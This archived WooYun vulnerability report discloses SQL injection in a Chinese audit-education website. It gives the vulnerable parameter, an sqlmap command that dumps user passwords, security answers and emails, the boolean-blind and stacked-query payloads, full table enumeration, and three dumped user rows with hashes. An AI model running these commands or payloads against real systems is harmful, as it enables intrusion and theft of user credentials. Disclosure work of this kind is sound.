乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-11-23: 细节已通知厂商并且等待厂商处理中 2015-11-27: 厂商已经确认,细节仅向厂商公开 2015-12-07: 细节向核心白帽子及相关领域专家公开 2015-12-17: 细节向普通白帽子公开 2015-12-27: 细节向实习白帽子公开 2016-01-11: 细节向公众公开
中国审计教育网由国内长期从事审计理论研究、审计教育工作的专家、学者和审计实务工作者于2003年6月共同投资兴建。从开办至今,中国审计教育网一直致力于以推动中国审计教育发展,培育中国审计精英为己任。经过近4年多的努力,现中国审计教育网已成为以整合、开发与共享审计教育与培训资源为特色,集审计教育与培训、审计理论研究与软件开发、审计国际交流与合作等功能为一体,专业化、高品质、国际化、一流的审计教育与培训平台。中国审计教育网作为中国审计行业最大的信息提供商,网站内容涵盖国家审计、社会审计、独立审计、ACCA培训、CISA培训、CIA培训 、CPA培训、金融审计、管理审计、计算机审计等方面的信息,并以及时全面的审计培训信息和丰富实用的免费审计资源赢得了广大审计专家和工作者的一致好评,并与审计署、南京审计学院、国内大型审计培训机构以及国内知名会计师事务所建立了良好的合作关系,形成了具有审计专业特色的行业网站,在审计行业网站中名列前茅。
地址:http://**.**.**.**/fagui_cont.asp?news_id=15711
python sqlmap.py -u "http://**.**.**.**/fagui_cont.asp?news_id=15711" -p news_id --technique=BS --random-agent --batch -D new_shenji -T dbo.Dv_User -C TruePassWord,UserAnswer,UserLastIP,UserName,UserPassword,UserMobile,UserEmail --dump --threads=10 --start 1 --stop 3
Database: master+--------------------------------------------------+---------+| Table | Entries |+--------------------------------------------------+---------+| sys.messages | 97526 || sys.sysmessages | 97526 |
| dbo.Dv_User | 6423 |
---Parameter: news_id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: news_id=15711 AND 3547=3547 Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries (comment) Payload: news_id=15711;WAITFOR DELAY '0:0:5'-----web server operating system: Windows 2008 or Vistaweb application technology: ASP.NET, ASP, Microsoft IIS 7.0back-end DBMS: Microsoft SQL Server 2008current user: '**.**.**.**'current user is DBA: Falsedatabase management system users [2]:[*] sa[*] **.**.**.**Database: new_shenji+--------------------------------------------------+---------+| Table | Entries |+--------------------------------------------------+---------+| dbo.newstable | 121526 || dbo.zhaopin | 10866 || dbo.neixun_fk | 9748 || dbo.Dv_Message | 7599 || dbo.Dv_User | 6423 || dbo.A_info | 3106 || dbo.link | 3062 || dbo.products | 2044 || dbo.A_comments | 2019 || dbo.j_mail | 1509 || dbo.baoming | 1042 || dbo.v_user | 970 || dbo.qiuzhi | 361 || dbo.Dv_Log | 334 || dbo.Dv_bbs1 | 203 || dbo.Dv_Topic | 195 || dbo.gcinfo | 133 || dbo.type | 131 || dbo.ks_info | 107 || dbo.gongkai | 96 || dbo.links | 91 || dbo.orderDetail | 64 || dbo.neixun | 58 || dbo.zjinfo | 47 || dbo.shenqing | 29 || dbo.Dv_Board | 26 || dbo.orders | 26 || dbo.Dv_UserGroups | 25 || dbo.hangye | 25 || dbo.v_info | 23 || dbo.Dv_Help | 21 || dbo.certificate | 18 || dbo.zhuanjia | 18 || dbo.about | 17 || dbo.Dv_SmallPaper | 17 || dbo.gg | 15 || dbo.A_category | 12 || dbo.user_type | 11 || dbo.x_fankui | 11 || dbo.anli | 8 || dbo.gaoceng | 8 || dbo.lunwen | 8 || dbo.protype | 7 || dbo.web_fk | 7 || dbo.Dv_AdCode | 6 || dbo.guestbook | 6 || dbo.Manage_User | 6 || dbo.v_order | 6 || dbo.zhiming | 6 || dbo.peixun | 5 || dbo.v_category | 5 || dbo.Dv_Upfile | 4 || dbo.client | 3 || dbo.Dv_Admin | 3 || dbo.Dv_BbsLink | 2 || dbo.Dv_BbsNews | 2 || dbo.Dv_Online | 2 || dbo.vote | 2 || dbo.Dv_ChallengeInfo | 1 || dbo.Dv_notdownload | 1 || dbo.Dv_Setup | 1 || dbo.Dv_Style | 1 || dbo.Dv_StyleHelp | 1 || dbo.Dv_TableList | 1 || dbo.Dv_Vote | 1 || dbo.tanchu | 1 |+--------------------------------------------------+---------+Database: master+--------------------------------------------------+---------+| Table | Entries |+--------------------------------------------------+---------+| sys.messages | 97526 || sys.sysmessages | 97526 || sys.fulltext_system_stopwords | 15829 || sys.syscolumns | 11949 || sys.all_parameters | 7088 || sys.system_parameters | 7088 || sys.trace_subclass_values | 5366 || sys.all_columns | 4655 || sys.system_columns | 4611 || sys.trace_event_bindings | 4304 || sys.syscomments | 2990 || dbo.spt_values | 2506 || sys.all_objects | 1931 || sys.sysobjects | 1931 || sys.system_objects | 1925 || sys.database_permissions | 1841 || sys.syspermissions | 1841 || sys.sysprotects | 1840 || sys.all_sql_modules | 1781 || sys.system_sql_modules | 1781 || sys.dm_audit_actions | 454 || sys.spatial_reference_systems | 390 || sys.event_notification_event_types | 364 || sys.all_views | 354 || sys.system_views | 354 || sys.trigger_event_types | 244 || sys.trace_events | 180 || sys.allocation_units | 130 || sys.partitions | 118 || sys.xml_schema_facets | 112 || sys.xml_schema_components | 99 || sys.system_components_surface_area_configuration | 93 || sys.dm_audit_class_type_map | 82 || sys.xml_schema_types | 82 || sys.configurations | 68 || sys.sysconfigures | 68 || sys.syscurconfigs | 68 || sys.trace_columns | 66 || sys.fulltext_document_types | 50 || sys.fulltext_languages | 48 || INFORMATION_SCHEMA.COLUMNS | 44 || sys.columns | 44 || sys.systypes | 34 || sys.types | 34 || sys.syslanguages | 33 || sys.securable_classes | 22 || sys.trace_categories | 21 || sys.database_mirroring | 19 || sys.database_recovery_status | 19 || sys.databases | 19 || sys.syscursorcolumns | 19 || sys.sysdatabases | 19 || sys.xml_schema_component_placements | 18 || INFORMATION_SCHEMA.SCHEMATA | 15 || sys.schemas | 15 || sys.xml_schema_attributes | 15 || sys.database_principals | 14 || sys.sysusers | 14 || sys.server_principals | 11 || sys.service_contract_message_usages | 11 || sys.server_permissions | 7 || sys.sysindexes | 7 || sys.indexes | 6 || sys.objects | 6 || sys.stats_columns | 6 || INFORMATION_SCHEMA.TABLE_PRIVILEGES | 5 || INFORMATION_SCHEMA.TABLES | 5 || sys.index_columns | 5 || sys.sysindexkeys | 5 || sys.tables | 5 || sys.endpoints | 4 || sys.assembly_types | 3 || sys.service_queue_usages | 3 || sys.stats | 3 || sys.type_assembly_usages | 3 || sys.xml_schema_namespaces | 3 || sys.database_files | 2 || sys.login_token | 2 || sys.service_contract_usages | 2 || sys.sql_logins | 2 || sys.sysfiles | 2 || sys.syslogins | 2 || sys.user_token | 2 || dbo.spt_monitor | 1 || sys.assemblies | 1 || sys.assembly_files | 1 || sys.data_spaces | 1 || sys.database_role_members | 1 || sys.default_constraints | 1 || sys.dm_exec_requests | 1 || sys.dm_exec_sessions | 1 || sys.filegroups | 1 || sys.server_role_members | 1 || sys.servers | 1 || sys.sysconstraints | 1 || sys.syscursorrefs | 1 || sys.syscursors | 1 || sys.syscursortables | 1 || sys.sysfilegroups | 1 || sys.sysmembers | 1 || sys.sysprocesses | 1 || sys.sysservers | 1 || sys.tcp_endpoints | 1 || sys.via_endpoints | 1 || sys.xml_schema_collections | 1 || sys.xml_schema_model_groups | 1 || sys.xml_schema_wildcards | 1 |+--------------------------------------------------+---------+Database: msdb+--------------------------------------------------+---------+| Table | Entries |+--------------------------------------------------+---------+| dbo.backupfile | 1974 || dbo.backupset | 987 || dbo.backupmediafamily | 986 || dbo.backupmediaset | 986 || dbo.restorefile | 26 || dbo.restorefilegroup | 13 || dbo.restorehistory | 13 || dbo.syspolicy_configuration | 4 |+--------------------------------------------------+---------+columns LIKE 'pass' were found in the following databases:sqlmap resumed the following injection point(s) from stored session:---Parameter: news_id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: news_id=15711 AND 3547=3547 Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries (comment) Payload: news_id=15711;WAITFOR DELAY '0:0:5'-----web server operating system: Windows 2008 or Vistaweb application technology: ASP.NET, ASP, Microsoft IIS 7.0back-end DBMS: Microsoft SQL Server 2008columns LIKE 'pass' were found in the following databases:sqlmap resumed the following injection point(s) from stored session:---Parameter: news_id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: news_id=15711 AND 3547=3547 Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries (comment) Payload: news_id=15711;WAITFOR DELAY '0:0:5'-----web server operating system: Windows 2008 or Vistaweb application technology: ASP.NET, ASP, Microsoft IIS 7.0back-end DBMS: Microsoft SQL Server 2008Database: new_shenjiTable: newstable[19 columns]+-------------------+---------------+| Column | Type |+-------------------+---------------+| news_audit | int || news_author | nvarchar || news_category1 | int || news_category2 | int || news_category3 | nvarchar || news_comment_bad | int || news_comment_good | int || news_cont | ntext || news_date | smalldatetime || news_editor | char || news_hit | int || news_id | int || news_paper | char || news_picurl | nvarchar || news_public | int || news_source | nvarchar || news_title | nvarchar || news_top | int || news_zhuanzhu | ntext |+-------------------+---------------+sqlmap resumed the following injection point(s) from stored session:---Parameter: news_id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: news_id=15711 AND 3547=3547 Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries (comment) Payload: news_id=15711;WAITFOR DELAY '0:0:5'-----web server operating system: Windows 2008 or Vistaweb application technology: ASP.NET, ASP, Microsoft IIS 7.0back-end DBMS: Microsoft SQL Server 2008Database: new_shenjiTable: Dv_User[70 columns]+---------------------+---------------+| Column | Type |+---------------------+---------------+| IsChallenge | tinyint || JoinDate | smalldatetime || LastLogin | smalldatetime || LockUser | tinyint || TitlePic | nvarchar || TruePassWord | nvarchar || UserAnswer | nvarchar || UserAudit | int || UserAvaSetting | ntext || UserBirthday | nvarchar || UserCertificate | nvarchar || UserCity | nvarchar || UserClass | nvarchar || UserCompany | nvarchar || UserCompanyAddress | nvarchar || UserCompanyCategory | nvarchar || UserCompanyIntro | ntext || UserContactor | char || UserContactorMsn | nvarchar || UserContactorQQ | nvarchar || userCP | int || UserDataBase | int || UserDel | int || UserEducation | char || UserEmail | nvarchar || userEP | int || UserExperience | char || UserFace | nvarchar || UserFav | nvarchar || userfax | nvarchar || userflag | int || UserGroup | nvarchar || UserGroupID | int || UserHeight | int || UserHidden | tinyint || UserID | int || UserIM | ntext || UserInfo | ntext || UserIsAva | tinyint || UserIsBest | int || UserJiFen | int || UserJoinDate | smalldatetime || UserLastIP | nvarchar || UserLastLogin | smalldatetime || userlevel | char || UserLogins | int || UserManager | char || UserMobile | nvarchar || usermobiletel | nvarchar || UserMsg | nvarchar || UserName | nvarchar || UserPassword | nvarchar || UserPhoto | nvarchar || UserPost | int || UserPower | int || userprofessinol | char || UserProvince | nvarchar || UserQuesion | nvarchar || userrealname | char || UserSetting | nvarchar || UserSex | tinyint || UserSign | nvarchar || usertel | nvarchar || UserTitle | nvarchar || UserToday | nvarchar || UserTopic | int || UserViews | int || userWealth | int || UserWebSite | nvarchar || UserWidth | int |+---------------------+---------------+sqlmap resumed the following injection point(s) from stored session:---Parameter: news_id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: news_id=15711 AND 3547=3547 Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries (comment) Payload: news_id=15711;WAITFOR DELAY '0:0:5'-----web server operating system: Windows 2008 or Vistaweb application technology: ASP.NET, ASP, Microsoft IIS 7.0back-end DBMS: Microsoft sqlmap resumed the following injection point(s) from stored session:---Parameter: news_id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: news_id=15711 AND 3547=3547 Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries (comment) Payload: news_id=15711;WAITFOR DELAY '0:0:5'-----web server operating system: Windows 2008 or Vistaweb application technology: ASP.NET, ASP, Microsoft IIS 7.0back-end DBMS: Microsoft SQL Server 2008Database: new_shenjiTable: Dv_User[3 entries]+------------------+------------------+-----------------+----------+------------------+------------+--------------------+| TruePassWord | UserAnswer | UserLastIP | UserName | UserPassword | UserMobile | UserEmail |+------------------+------------------+-----------------+----------+------------------+------------+--------------------+| r84y6115O3q4tQFJ | 8e2178fd2b5a96b1 | **.**.**.** | 0000 | 8ad9902aecba32e2 | NULL | schbj@**.**.**.** || 4O263V7IhC324jxc | 8ad9902aecba32e2 | **.**.**.** | 0000000 | 8ad9902aecba32e2 | NULL | asdf@**.**.**.** || CgWJAnL9970wE057 | 7bb52e4599f2886c | **.**.**.** | 0002338 | f2d382aba5d6e6ad | NULL | fmnyvx@**.**.**.** |+------------------+------------------+-----------------+----------+------------------+------------+--------------------+
增加过滤。
危害等级:高
漏洞Rank:11
确认时间:2015-11-27 11:18
CNVD确认并复现所述情况,已由CNVD通过网站管理方公开联系渠道向其邮件通报,由其后续提供解决方案。
暂无
